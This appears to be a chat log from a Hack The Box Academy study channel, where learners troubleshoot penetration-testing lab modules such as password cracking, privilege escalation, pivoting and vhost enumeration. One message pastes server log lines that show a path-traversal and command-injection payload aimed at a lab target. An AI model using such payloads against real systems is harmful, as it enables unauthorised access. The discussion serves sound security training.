i'm on the cpts path and i'm thinking about do the module windows fundamentals before password attacks to get more base and understand everything better.

what do you think??

ocean flower
#

python3 pwsafe2john.py ../../../Employee-Passwords_OLD.psafe3
Traceback (most recent call last):
File "/home/attacker/Desktop/cpts/john/pwsafe2john.py", line 63, in <module>
process_file(sys.argv[i])
File "/home/attacker/Desktop/cpts/john/pwsafe2john.py", line 33, in process_file
sys.stderr.write("%s : PWS3 magic string missing, is this a Password Safe file?\n", filename)

why it's not working ?

torn fiber
steady pelican
#

Hello
I am on Windows Privilege Escalation Module, I am solving Windows Group Privileges -> DNS Admin module, I followed every steps outlined in module, got myself into Domain Admins group or try to get shell as well. Still nothing works, any nudge would be helpful.

acoustic owl
#

If you have added yourself to a new group, you must log out once and then log back in for the permissions to take effect.

steady pelican
#

I thought the same, I did. However, it didn't work!

steady pelican
#

There is no option to restart the target. However, I logged out and logged in again. Still didn't work!

frigid flare
#

hey i have been doing htb academy for a few weeks now and am done with basic modules such as linux fundamentals and network analysis, what is the best time to start HTB labs, what modules should i have completed before jumping to the labs

woven storm
# woven storm thank you for assistance

@fathom pendant yooo i did it 🎉 the thing which take like 3-4 hours of work and still confused as hell. i did it iin like 25 min and in first try of this session too🥳

wheat silo
#

I’m working on the Web server pivoting with Rpivot section in Pivoting tunneling and forwarding. I set up server.py on the attack host and client.py on the pivot host as it said in the text and made sure i had socks4 127.0.0.1 9050 in my proxychains.conf file but when I go to Firefox to open the site it says it can’t be reached. I tried resetting the machine but still can’t connect to the web server.

woven storm
vale geyser
#

anyone for command injection the advanced obfuscation. I need a sanity check, because i am banging my head against the wall since hours and have the feeling i'm missing a tiny part

digital pendant
#

@vale geyser shoot not long did this one

#

DM if you want

terse bloom
#

Did anyone solve RDP and Socks tunneling with socksoverrdp in pivoting module with ligolo? This section is a double pivot, so I thought it would work, but for me it doesn't...

plain charm
steady pelican
#

It has only disconnect option, when I tried through powershell, it didn't work

quiet trout
#

the commands dont "work" for gobuster and feroxbuster to enumerate vhosts...

#

ffuf works same wordlist, right off the bat.

oak wraith
#

Hello there, I am almost at the skills assesment in the "Advanced XSS & CSRF", but I have and empty flag at Lab Warm-up. I obtain the flag but HTB says it is wrong. Can you guys help me about it?

silk lagoon
#

Check if you have any spaces

plain charm
steady pelican
#

Yes, I did

#

I have followed every step outlined in the module.

plain charm
leaden island
#

yo guys ive a question

#

(deleted cuz i figured everything out)

cedar mural
#

https://academy.hackthebox.com/module/23/section/513
10.30.18.194 - - [19/Aug/2025:13:59:06 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 4316 "-" ""
10.30.18.194 - - [19/Aug/2025:13:59:39 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=ls%20/ HTTP/1.1" 200 4500 "-"
Why don't I see the output in the response?

quiet trout
fathom pendant
quiet trout
#

the web server configuration

fathom pendant
quiet trout
fathom pendant
quiet trout
#

ah ill skip a lil ahead and take a peek

fathom pendant
#

Well the crawling answers a few questions

quiet trout
#

is there any idea why you have to put a / (or the entire path for that matter) for that admin Q?

#

that seems silly or is that robots.txt working? and curl abiding by it?

fathom pendant
fathom pendant
quiet trout
#

thats what i thought so im a lil confused

#

im restarting the box this is getting weird man

#

yeah i wish it would just throw up a box with the web server running on 80 im basically bacjk in the same scenario i can already tell

fathom pendant
#

As i said adding the / should pull it

#

Also making sure you curl http://do.main:port/resource_here/

quiet trout
#

for every resource?

#

not just the one you mentioned?

fathom pendant
#

Well the tl;dr: you have to point things in the right direction. The port is important

quiet trout
#

Im with you there. I think my lack of familiarity of dealing with web servers that have vhosts but want to serve on ports other than 80/443 was new to me when i did this lab but even when i specify the port such as in curl requests and even active scans that are instructed to use the port im getting just the most odd behavior ever. im now actually in a worse place than i was before robots is returning as a resource in the scan results but 404'ing

silent kindle
fathom pendant
#

Im assuming you added the vhost in your /etc/hosts file

fathom pendant
silent kindle
quiet trout
fathom pendant
quiet trout
fathom pendant
fathom pendant
quiet trout
fathom pendant
#

The main thing is using the Host header